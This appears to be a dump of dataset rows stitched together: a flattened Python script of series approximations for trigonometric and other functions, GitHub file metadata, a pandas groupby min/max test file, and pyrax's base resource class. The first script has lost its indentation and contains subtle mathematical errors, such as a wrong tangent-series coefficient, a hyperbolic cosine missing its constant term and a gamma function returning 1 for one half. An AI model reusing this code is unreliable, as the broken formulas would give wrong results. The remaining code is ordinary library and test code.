luv3=100*(int(sq[0])*100+int(sq[1])*10+int(sq[2])-100*a*a-(20*a+b)*b)-c*(200*a+20*b+c);
c=c+1;
if luv3<0:
ha=0;
c=c-2;
print('Square root of ',sq , ' ',10*a+b,'.',c)
#Maclaurin expansion of all trignometric and hyperbolic functions
n=100
def hfactorial(n):
s=1;
for j in range(1,n+1):
s=s*j
return s
def hsin(x):
return x-x*x*x/6+x*x*x*x*x/120-x*x*x*x*x*x*x/5040;
def hcos(x):
return 1-x*x/2+1/24*x*x*x*x-x*x*x*x*x*x/720;
def htan(x):
return x+x*x*x/3+2/15*x*x*x*x*x+17/315*x*x*x*x*x*x*x+62/2035*x*x*x*x*x*x*x*x*x;
def h2cos(x):
s=0.0;
for j in range(n):
s=s+(-1)**j/hfactorial(2*j)*(x**(2*j))
return s
def h2sin(x):
s=0.0;
for j in range(n):
s=s+(-1)**j/hfactorial(2*j+1)*(x**(2*j+1))
return s
def h2sinh(x):
s=0.0;
for j in range(n):
s=s+1/hfactorial(2*j+1)*(x**(2*j+1))
return s
def h2atanh(x):
s=0.0;
for j in range(1,n):
s=s+1/(2*j-1)*(x**(2*j-1))
return s
def h2atan(x):
s=0.0;
for j in range(1,n):
s=s+(-1.0)**(j+1)/(2*j-1)*(x**(2*j-1))
return s
def h2ln1px(x):
s=0.0;
for j in range(1,n):
s=s+(-1)**(j+1)/j*(x**(j))
return s
def h2erf(x):
s=0.0;
for j in range(1,n):
s=s+2/np.sqrt(np.pi)*(-1)**j/(2*j+1)/hfactorial(j)*(x**(2*j+1))
return s
def h2exp(x):
s=0.0;
for j in range(n):
s=s+1.0/hfactorial(j)*(x**(j))
return s
def h2acot(x):
s=0.0;
for j in range(1,n):
s=s+(-1)**j/(2*j+1)*(x**(2*j+1))
return np.pi/2-s
def h2cosh(x):
s=0.0;
for j in range(1,n):
s=s+1/hfactorial(2*j)*(x**(2*j))
return s
print('pi',h2atan(1)*4.0)
print('e',h2exp(1))
"""
import numpy as np
import matplotlib.pyplot as plt
def h2gamma(n):
if n==1:
return 1;
if n==0.5:
return 1;
else:
return (n-1)*h2gamma(n-1);
x=np.arange(0,0.5,0.1)
#plt.plot(x,h2sin(x),x,h2cos(x),x,h2exp(x),x,h2erf(x),x,h2cosh(x),x,h2acot(x),x,h2erf(x),x,h2ln1px(x),x,h2atan(x),x,h2atanh(x))
#plt.show()
"""
|
[
"noreply@github.com"
] |
harishravi121.noreply@github.com
|
4ba94ad8d63b1aded9da71576d77fa7a6caafdec
|
159d4ae61f4ca91d94e29e769697ff46d11ae4a4
|
/venv/lib/python3.9/site-packages/pandas/tests/groupby/test_min_max.py
|
25a57d24e04ef974fbd644249e8114cbe40588c9
|
[
"MIT"
] |
permissive
|
davidycliao/bisCrawler
|
729db002afe10ae405306b9eed45b782e68eace8
|
f42281f35b866b52e5860b6a062790ae8147a4a4
|
refs/heads/main
| 2023-05-24T00:41:50.224279
| 2023-01-22T23:17:51
| 2023-01-22T23:17:51
| 411,470,732
| 8
| 0
|
MIT
| 2023-02-09T16:28:24
| 2021-09-28T23:48:13
|
Python
|
UTF-8
|
Python
| false
| false
| 5,733
|
py
|
import numpy as np
import pytest
from pandas._libs.tslibs import iNaT
import pandas as pd
from pandas import (
DataFrame,
Index,
Series,
)
import pandas._testing as tm
def test_max_min_non_numeric():
# #2700
aa = DataFrame({"nn": [11, 11, 22, 22], "ii": [1, 2, 3, 4], "ss": 4 * ["mama"]})
result = aa.groupby("nn").max()
assert "ss" in result
result = aa.groupby("nn").max(numeric_only=False)
assert "ss" in result
result = aa.groupby("nn").min()
assert "ss" in result
result = aa.groupby("nn").min(numeric_only=False)
assert "ss" in result
def test_max_min_object_multiple_columns(using_array_manager):
# GH#41111 case where the aggregation is valid for some columns but not
# others; we split object blocks column-wise, consistent with
# DataFrame._reduce
df = DataFrame(
{
"A": [1, 1, 2, 2, 3],
"B": [1, "foo", 2, "bar", False],
"C": ["a", "b", "c", "d", "e"],
}
)
df._consolidate_inplace() # should already be consolidate, but double-check
if not using_array_manager:
assert len(df._mgr.blocks) == 2
gb = df.groupby("A")
with tm.assert_produces_warning(FutureWarning, match="Dropping invalid"):
result = gb.max(numeric_only=False)
# "max" is valid for column "C" but not for "B"
ei = Index([1, 2, 3], name="A")
expected = DataFrame({"C": ["b", "d", "e"]}, index=ei)
tm.assert_frame_equal(result, expected)
with tm.assert_produces_warning(FutureWarning, match="Dropping invalid"):
result = gb.min(numeric_only=False)
# "min" is valid for column "C" but not for "B"
ei = Index([1, 2, 3], name="A")
expected = DataFrame({"C": ["a", "c", "e"]}, index=ei)
tm.assert_frame_equal(result, expected)
def test_min_date_with_nans():
# GH26321
dates = pd.to_datetime(
Series(["2019-05-09", "2019-05-09", "2019-05-09"]), format="%Y-%m-%d"
).dt.date
df = DataFrame({"a": [np.nan, "1", np.nan], "b": [0, 1, 1], "c": dates})
result = df.groupby("b", as_index=False)["c"].min()["c"]
expected = pd.to_datetime(
Series(["2019-05-09", "2019-05-09"], name="c"), format="%Y-%m-%d"
).dt.date
tm.assert_series_equal(result, expected)
result = df.groupby("b")["c"].min()
expected.index.name = "b"
tm.assert_series_equal(result, expected)
def test_max_inat():
# GH#40767 dont interpret iNaT as NaN
ser = Series([1, iNaT])
gb = ser.groupby([1, 1])
result = gb.max(min_count=2)
expected = Series({1: 1}, dtype=np.int64)
tm.assert_series_equal(result, expected, check_exact=True)
result = gb.min(min_count=2)
expected = Series({1: iNaT}, dtype=np.int64)
tm.assert_series_equal(result, expected, check_exact=True)
# not enough entries -> gets masked to NaN
result = gb.min(min_count=3)
expected = Series({1: np.nan})
tm.assert_series_equal(result, expected, check_exact=True)
def test_max_inat_not_all_na():
# GH#40767 dont interpret iNaT as NaN
# make sure we dont round iNaT+1 to iNaT
ser = Series([1, iNaT, 2, iNaT + 1])
gb = ser.groupby([1, 2, 3, 3])
result = gb.min(min_count=2)
# Note: in converting to float64, the iNaT + 1 maps to iNaT, i.e. is lossy
expected = Series({1: np.nan, 2: np.nan, 3: iNaT + 1})
tm.assert_series_equal(result, expected, check_exact=True)
@pytest.mark.parametrize("func", ["min", "max"])
def test_groupby_aggregate_period_column(func):
# GH 31471
groups = [1, 2]
periods = pd.period_range("2020", periods=2, freq="Y")
df = DataFrame({"a": groups, "b": periods})
result = getattr(df.groupby("a")["b"], func)()
idx = pd.Int64Index([1, 2], name="a")
expected = Series(periods, index=idx, name="b")
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize("func", ["min", "max"])
def test_groupby_aggregate_period_frame(func):
# GH 31471
groups = [1, 2]
periods = pd.period_range("2020", periods=2, freq="Y")
df = DataFrame({"a": groups, "b": periods})
result = getattr(df.groupby("a"), func)()
idx = pd.Int64Index([1, 2], name="a")
expected = DataFrame({"b": periods}, index=idx)
tm.assert_frame_equal(result, expected)
def test_aggregate_numeric_object_dtype():
# https://github.com/pandas-dev/pandas/issues/39329
# simplified case: multiple object columns where one is all-NaN
# -> gets split as the all-NaN is inferred as float
df = DataFrame(
{"key": ["A", "A", "B", "B"], "col1": list("abcd"), "col2": [np.nan] * 4},
).astype(object)
result = df.groupby("key").min()
expected = DataFrame(
{"key": ["A", "B"], "col1": ["a", "c"], "col2": [np.nan, np.nan]}
).set_index("key")
tm.assert_frame_equal(result, expected)
# same but with numbers
df = DataFrame(
{"key": ["A", "A", "B", "B"], "col1": list("abcd"), "col2": range(4)},
).astype(object)
result = df.groupby("key").min()
expected = DataFrame(
{"key": ["A", "B"], "col1": ["a", "c"], "col2": [0, 2]}
).set_index("key")
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("func", ["min", "max"])
def test_aggregate_categorical_lost_index(func: str):
# GH: 28641 groupby drops index, when grouping over categorical column with min/max
ds = Series(["b"], dtype="category").cat.as_ordered()
df = DataFrame({"A": [1997], "B": ds})
result = df.groupby("A").agg({"B": func})
expected = DataFrame({"B": ["b"]}, index=Index([1997], name="A"))
# ordered categorical dtype should be preserved
expected["B"] = expected["B"].astype(ds.dtype)
tm.assert_frame_equal(result, expected)
|
[
"davidycliao@gmail.com"
] |
davidycliao@gmail.com
|
fd14a8d1149199664afe6d1f9f84b157b93b7cfb
|
bc1b9455826f2e07976c04b20515ac4a45eaf6b6
|
/pyrax/resource.py
|
da570dcd342c43305fcae4a4a1f9c5ba3598bcd5
|
[] |
no_license
|
gondoi/pyrax
|
b3df411d4c1ed8d8e1e0151e9378f7400ff782fc
|
4a917f55e706b650774a305a424ed456da773f02
|
refs/heads/master
| 2021-01-18T11:21:13.557056
| 2012-12-19T22:49:52
| 2012-12-19T22:49:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,352
|
py
|
# Copyright 2010 Jacob Kaplan-Moss
# Copyright 2011 OpenStack LLC.
# Copyright 2012 Rackspace
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Base utilities to build API operation managers and objects on top of.
"""
import pyrax.utils as utils
class BaseResource(object):
"""
A resource represents a particular instance of an object (server, flavor,
etc). This is pretty much just a bag for attributes.
"""
HUMAN_ID = False
NAME_ATTR = "name"
def __init__(self, manager, info, loaded=False):
self._loaded = loaded
self.manager = manager
self._info = info
self._add_details(info)
@property
def human_id(self):
"""Subclasses may override this to provide a pretty ID which can be used
for bash completion.
"""
if self.NAME_ATTR in self.__dict__ and self.HUMAN_ID:
return utils.slugify(getattr(self, self.NAME_ATTR))
return None
def _add_details(self, info):
"""
Takes the dict returned by the API call and sets the
corresponding attributes on the object.
"""
for (key, val) in info.iteritems():
setattr(self, key, val)
def __getattr__(self, key):
"""
Many objects are lazy-loaded: only their most basic details
are initially returned. The first time any of the other attributes
are referenced, a GET is made to get the full details for the
object.
"""
if not self.loaded:
self.get()
# Attribute should be set; if not, it's not valid
try:
return self.__dict__[key]
except KeyError:
raise AttributeError("'%s' object has no attribute '%s'." % (self.__class__, key))
def __repr__(self):
reprkeys = sorted(key for key in self.__dict__.keys()
if (key[0] != "_") and (key != "manager"))
info = ", ".join("%s=%s" % (key, getattr(self, key)) for key in reprkeys)
return "<%s %s>" % (self.__class__.__name__, info)
def get(self):
"""Gets the details for the object."""
# set 'loaded' first ... so if we have to bail, we know we tried.
self.loaded = True
if not hasattr(self.manager, "get"):
return
new = self.manager.get(self)
if new:
self._add_details(new._info)
def delete(self):
"""Deletes the object."""
# set 'loaded' first ... so if we have to bail, we know we tried.
self.loaded = True
if not hasattr(self.manager, "delete"):
return
self.manager.delete(self)
def __eq__(self, other):
"""
Two resource objects that represent the same entity in the cloud
should be considered equal if they have the same ID. If they
don't have IDs, but their attribute info matches, they are equal.
"""
if not isinstance(other, self.__class__):
return False
if hasattr(self, "id") and hasattr(other, "id"):
return self.id == other.id
return self._info == other._info
def reload(self):
"""
Since resource objects are essentially snapshots of the entity they
represent at the time they are created, they do not update as the
entity updates. For example, the 'status' attribute can change, but
the instance's value for 'status' will not. This method will refresh
the instance with the current state of the underlying entity.
"""
new_obj = self.manager.get(self.id)
self._add_details(new_obj._info)
def _get_loaded(self):
return self._loaded
def _set_loaded(self, val):
self._loaded = val
loaded = property(_get_loaded, _set_loaded)
|
[
"ed@leafe.com"
] |
ed@leafe.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.